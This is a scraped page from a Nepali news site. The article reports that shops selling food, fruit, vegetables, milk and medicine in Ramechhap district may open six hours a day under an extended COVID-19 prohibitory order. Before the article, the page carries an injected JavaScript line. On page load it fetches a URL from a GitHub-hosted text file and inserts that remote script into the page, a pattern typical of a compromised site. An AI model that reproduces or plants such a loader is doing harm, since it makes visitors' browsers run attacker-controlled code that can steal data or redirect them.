;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछाप आजदेखि ६ घण्टा तरकारी तथा फलफूल, खाद्ययनका पसल खुल्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछाप आजदेखि ६ घण्टा तरकारी तथा फलफूल, खाद्ययनका पसल खुल्ने
रामेछाप बिशेष

रामेछाप आजदेखि ६ घण्टा तरकारी तथा फलफूल, खाद्ययनका पसल खुल्ने

भदौ १२,

रामेछाप । रामेछाप जिल्लामा कोरोना भाइरस संक्रमणको दर बड्दै गएकोले भोली शनिबार भदौ १३ गते राति १२ बजेसम्मका लागि जारी निषेधाज्ञालाई लमब्यासंगै अब जिल्लामा संचालित स्वास्थ्य तथा सुरक्षाका मापदण्ड पूरा गरेर उपभोग्य वस्तु  खरिद बिक्री गर्ने पसलहुर दिनको ६ घण्टा खुल्ने भएका छन् । औषधी, खाद्यान्न, फलफूल, तरकारी, दुध लगयतका अत्यावश्यक सेवाहरु दिनको ६ घण्टा खुलाउने जिल्ला प्रशासन कार्यालय रामेछापले जनाएको छ ।

गत साउन ३० गते राति १२ बजेदेखि ११ गतेसम्मलाई पहिलो पटक जारि गरिएको निषधाज्ञा थप तीन दिनका लागि दोस्रो पटक थप गरिएकोमा बिहिबार पुःन तेस्रो पटक एक साताको लागि थप गरिएको जिल्लामा निषेधाज्ञा १८ गते राति १२ बजेस्मको लागि लागू गरिएको छ ।

सोहि निर्णयमा प्रशासनले शुक्रबार जिल्लामा संचालित औषधी, खाद्यान्न, फलफूल, तरकारी,दुध दैनिक ६ घण्टा संचालन गर्न दिने उल्लेख गरेको छ । अब जिल्लामा संचालित अत्यावश्यक खाद्यान्न वस्तुहरु बिहान ५ : ०० बजेबाट बिहान ११ : ०० बजे सम्म सञ्चालन हुने छन् ।

फेसबुक प्रतिक्रियाहरु